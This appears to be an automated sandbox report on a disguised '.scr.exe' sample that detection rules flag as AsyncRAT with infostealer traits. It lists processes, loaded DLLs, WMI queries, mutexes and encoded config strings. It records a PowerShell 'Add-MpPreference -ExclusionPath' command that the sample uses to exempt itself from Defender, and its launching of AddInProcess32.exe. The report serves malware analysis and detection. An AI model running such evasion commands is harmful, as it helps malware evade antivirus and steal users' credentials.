Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DD03CC	6_2_07DD03CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DD7780	6_2_07DD7780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DD2729	6_2_07DD2729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DDFA10	6_2_07DDFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DDFA03	6_2_07DDFA03

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7368 -s 1044

Source: RFQPO3D93876738.scr.exe

Static PE information: No import functions for PE file found

Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1555711757.000002423D198000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAceyoxik2 vs RFQPO3D93876738.scr.exe
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1555711757.000002423D198000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIgewilajazihoradixuw0 vs RFQPO3D93876738.scr.exe
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554189470.000002422B600000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAceyoxik2 vs RFQPO3D93876738.scr.exe
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B3DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs RFQPO3D93876738.scr.exe
Source: RFQPO3D93876738.scr.exe, 00000000.00000000.1304142282.000002422B272000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIgewilajazihoradixuw0 vs RFQPO3D93876738.scr.exe
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs RFQPO3D93876738.scr.exe
Source: RFQPO3D93876738.scr.exe	Binary or memory string: OriginalFilenameIgewilajazihoradixuw0 vs RFQPO3D93876738.scr.exe

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.AddInProcess32.exe.7200000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: RFQPO3D93876738.scr.exe, --.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Settings.cs	Base64 encoded string: 'NVmmOiBdFFpT9LDQ+riJ5jIZ6EvD6M+5D/dZCbFx4CygJqXgGQalBxJ26DdK5itm', 'm7eFvU8ozCwZmkeK7ETJ7PoKoU7oCVJ+jeeopFKiMSHf0YWfrK/XING1BtrIHaPS'
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Settings.cs	Base64 encoded string: 'NVmmOiBdFFpT9LDQ+riJ5jIZ6EvD6M+5D/dZCbFx4CygJqXgGQalBxJ26DdK5itm', 'm7eFvU8ozCwZmkeK7ETJ7PoKoU7oCVJ+jeeopFKiMSHf0YWfrK/XING1BtrIHaPS'

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B442000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbbL
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@9/11@2/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File created: C:\Users\user\AppData\Local\SystemCache

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\b4skQsn2Aw97KQDu
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7368
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nqchips.teg.ps1

Jump to behavior

Source: RFQPO3D93876738.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: RFQPO3D93876738.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AddInProcess32.exe, 00000006.00000002.1554299366.00000000033C6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: RFQPO3D93876738.scr.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

File read: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe"
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7368 -s 1044
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQPO3D93876738.scr.exe

